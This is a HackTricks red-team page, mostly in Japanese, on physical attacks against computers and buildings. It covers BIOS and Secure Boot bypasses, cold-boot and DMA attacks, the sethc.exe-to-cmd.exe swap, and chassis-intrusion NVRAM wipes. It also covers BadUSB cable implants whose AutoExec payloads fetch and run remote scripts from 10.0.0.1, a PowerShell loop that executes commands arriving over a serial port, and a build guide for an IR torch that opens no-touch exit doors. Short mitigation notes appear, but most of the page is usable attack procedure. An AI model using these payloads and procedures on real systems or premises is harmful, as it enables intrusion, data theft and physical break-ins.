物理攻撃

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！

**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。

HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

BIOS パスワード回復とシステムセキュリティ

BIOS のリセットは、いくつかの方法で行えます。ほとんどのマザーボードには、取り外して約30分放置するとパスワードを含むBIOS設定がリセットされるバッテリーが付属しています。あるいは、特定のピンを接続することでこれらの設定をリセットするためにマザーボード上のジャンパーを調整することもできます。

ハードウェアの調整が不可能または実用的でない場合、ソフトウェアツールが解決策を提供します。Live CD/USBからシステムを起動し、Kali Linuxのようなディストリビューションを使うと、**killCmosやCmosPWD**といったツールにアクセスでき、BIOSパスワードの回復を支援できます。

BIOSパスワードが不明な場合、誤って入力を3回行うと通常エラーコードが表示されます。このコードをhttps://bios-pw.orgのようなサイトで使用すると、利用可能なパスワードを取得できる場合があります。

UEFI セキュリティ

従来のBIOSの代わりにUEFIを採用している最新のシステムでは、ツールchipsecを使用してUEFI設定を解析・変更できます。これにはSecure Bootの無効化も含まれます。以下のコマンドで実行できます：

python chipsec_main.py -module exploits.secure.boot.pk

RAM 分析と Cold Boot Attacks

RAM は電源遮断後もしばらくデータを保持し、通常は1 to 2 minutes程度残ります。この持続時間は液体窒素のような低温物質を適用することで10 minutesまで延長できます。この延長された期間中に、memory dump を dd.exe や volatility のようなツールで作成して解析できます。

Direct Memory Access (DMA) Attacks

INCEPTION は physical memory manipulation を DMA 経由で行うためのツールで、FireWire や Thunderbolt のようなインターフェースに対応しています。メモリをパッチして任意のパスワードを受け入れるようにすることでログイン手順をバイパスできます。ただし、Windows 10 システムには効果がありません。

Live CD/USB を使ったシステムアクセス

sethc.exe や Utilman.exe のようなシステムバイナリを cmd.exe のコピーに差し替えることで、システム特権のコマンドプロンプトを取得できます。chntpw のようなツールを使って Windows インストールの SAM ファイルを編集し、パスワードを変更することも可能です。

Kon-Boot は一時的に Windows カーネルや UEFI を改変してパスワードを知らなくても Windows にログインできるようにするツールです。詳細は https://www.raymond.cc を参照してください。

Windows セキュリティ機能の扱い方

ブートとリカバリのショートカット

Supr: BIOS 設定にアクセスします。
F8: リカバリモードに入ります。
Windows バナーの後に Shift を押すと自動ログオンをバイパスできることがあります。

BAD USB Devices

Rubber Ducky や Teensyduino のようなデバイスは bad USB デバイスを作成するためのプラットフォームとして機能し、ターゲットコンピュータに接続されると事前定義されたペイロードを実行できます。

Volume Shadow Copy

管理者権限があれば PowerShell を通じて機密ファイル（SAM ファイルを含む）のコピーを作成できます。

BadUSB / HID インプラント技術

Wi-Fi managed cable implants

ESP32-S3 ベースのインプラント（例: Evil Crow Cable Wind）は USB-A→USB-C や USB-C↔USB-C ケーブル内に隠れ、純粋に USB キーボードとして列挙され、C2 スタックを Wi‑Fi 経由で公開します。オペレータは被害者ホストからケーブルに電源を供給し、Evil Crow Cable Wind という名前でパスワード 123456789 のホットスポットを作成し、http://cable-wind.local/（またはその DHCP アドレス）にブラウズするだけで組み込みの HTTP インターフェースにアクセスできます。
ブラウザ UI は Payload Editor, Upload Payload, List Payloads, AutoExec, Remote Shell, Config といったタブを提供します。保存されたペイロードは OS ごとにタグ付けされ、キーボードレイアウトはその場で切り替えられ、VID/PID 文字列を既知の周辺機器に見せかけるよう変更できます。
C2 がケーブル内に存在するため、電話でペイロードを配置・実行トリガー・Wi‑Fi 資格情報の管理ができ、ホスト OS に触れることなく操作可能です — 短時間の物理侵入に最適です。

OS-aware AutoExec payloads

AutoExec ルールは 1 つ以上のペイロードを USB 列挙直後に即時実行するようバインドします。インプラントは軽量な OS フィンガープリンティングを行い、一致するスクリプトを選択します。
例:
Windows: GUI r → powershell.exe → STRING powershell -nop -w hidden -c "iwr http://10.0.0.1/drop.ps1|iex" → ENTER.
macOS/Linux: COMMAND SPACE (Spotlight) または CTRL ALT T (terminal) → STRING curl -fsSL http://10.0.0.1/init.sh | bash → ENTER.
実行が無人で行われるため、単に充電ケーブルを差し替えるだけでログオン中のユーザコンテキスト下で「plug-and-pwn」な初期アクセスを達成できます。

HID-bootstrapped remote shell over Wi-Fi TCP

Keystroke bootstrap: 保存されたペイロードはコンソールを開き、新しい USB serial device 上に到着するものを実行するループを貼り付けます。最小限の Windows バリアントは:

$port=New-Object System.IO.Ports.SerialPort 'COM6',115200,'None',8,'One'
$port.Open(); while($true){$cmd=$port.ReadLine(); if($cmd){Invoke-Expression $cmd}}

Cable bridge: インプラントはUSB CDCチャネルを開いたままにし、そのESP32-S3がオペレーター側へTCP client（Python script, Android APK, or desktop executable）を起動します。TCPセッションに入力されたバイトは上記のシリアルループへ転送され、air-gappedホスト上でもremote command executionを可能にします。出力は限られるため、オペレーターは通常blind commands（アカウント作成、追加ツールのステージング等）を実行します。

HTTP OTA 更新インターフェース

同じweb stackは通常、認証なしのファームウェア更新を公開します。Evil Crow Cable Windは/updateを監視し、アップロードされたバイナリをそのままフラッシュします：

curl -F "file=@firmware.ino.bin" http://cable-wind.local/update

フィールドオペレーターは、ケーブルを開けずにエンゲージメント中に機能をホットスワップできる（例: flash USB Army Knife firmware）。これにより、implant はターゲットホストに接続したまま新しい機能へピボットできる。

スイッチは EC 上の GPIO interrupt に配線されている。
EC 上で動作するファームウェアは タイミングと押下回数 を記録している。
ハードコードされたパターンが認識されると、EC は mainboard-reset ルーチンを呼び出し、system NVRAM/CMOS の内容を消去する。
次回起動時に BIOS はデフォルト値を読み込む – supervisor password, Secure Boot keys, and all custom configuration are cleared。

一旦 Secure Boot が無効化され、firmware password が消えると、攻撃者は外部の任意の OS イメージをブートして内部ドライブへ無制限にアクセスできるようになる。

Real-World Example – Framework 13 Laptop

The recovery shortcut for the Framework 13 (11th/12th/13th-gen) is:

Press intrusion switch  →  hold 2 s
Release                 →  wait 2 s
(repeat the press/release cycle 10× while the machine is powered)

After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM at the next reboot. The whole procedure takes ~40 s and requires ドライバーだけで済む。

Generic Exploitation Procedure

Power-on or suspend-resume the target so the EC is running.
Remove the bottom cover to expose the intrusion/maintenance switch.
Reproduce the vendor-specific toggle pattern (consult documentation, forums, or reverse-engineer the EC firmware).
Re-assemble and reboot – firmware protections should be disabled.
Boot a live USB (e.g. Kali Linux) and perform usual post-exploitation (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).

Detection & Mitigation

OS管理コンソールにchassis-intrusionイベントを記録し、予期しないBIOSリセットと相関させる。
ネジやカバーに改ざん防止シールを用いて開封を検出する。
デバイスは物理的に管理された場所に保管すること。物理アクセスがあれば完全な妥協を想定する。
可能であればベンダーの“maintenance switch reset”機能を無効化するか、NVRAMリセットに対して追加の暗号認証を要求する。

Covert IR Injection Against No-Touch Exit Sensors

Sensor Characteristics

Commodity “wave-to-exit” sensors pair a near-IR LED emitter with a TV-remote style receiver module that only reports logic high after it has seen multiple pulses (~4–10) of the correct carrier (≈30 kHz).
A plastic shroud blocks the emitter and receiver from looking directly at each other, so the controller assumes any validated carrier came from a nearby reflection and drives a relay that opens the door strike.
Once the controller believes a target is present it often changes the outbound modulation envelope, but the receiver keeps accepting any burst that matches the filtered carrier.

Attack Workflow

Capture the emission profile – clip a logic analyser across the controller pins to record both the pre-detection and post-detection waveforms that drive the internal IR LED.
Replay only the “post-detection” waveform – remove/ignore the stock emitter and drive an external IR LED with the already-triggered pattern from the outset. Because the receiver only cares about pulse count/frequency, it treats the spoofed carrier as a genuine reflection and asserts the relay line.
Gate the transmission – transmit the carrier in tuned bursts (e.g., tens of milliseconds on, similar off) to deliver the minimum pulse count without saturating the receiver’s AGC or interference handling logic. Continuous emission quickly desensitises the sensor and stops the relay from firing.

Long-Range Reflective Injection

Replacing the bench LED with a high-power IR diode, MOSFET driver, and focusing optics enables reliable triggering from ~6 m away.
The attacker does not need line-of-sight to the receiver aperture; aiming the beam at interior walls, shelving, or door frames that are visible through glass lets reflected energy enter the ~30° field of view and mimics a close-range hand wave.
Because the receivers expect only weak reflections, a much stronger external beam can bounce off multiple surfaces and still remain above the detection threshold.

Weaponised Attack Torch

Embedding the driver inside a commercial flashlight hides the tool in plain sight. Swap the visible LED for a high-power IR LED matched to the receiver’s band, add an ATtiny412 (or similar) to generate the ≈30 kHz bursts, and use a MOSFET to sink the LED current.
A telescopic zoom lens tightens the beam for range/precision, while a vibration motor under MCU control gives haptic confirmation that modulation is active without emitting visible light.
Cycling through several stored modulation patterns (slightly different carrier frequencies and envelopes) increases compatibility across rebranded sensor families, letting the operator sweep reflective surfaces until the relay audibly clicks and the door releases.

References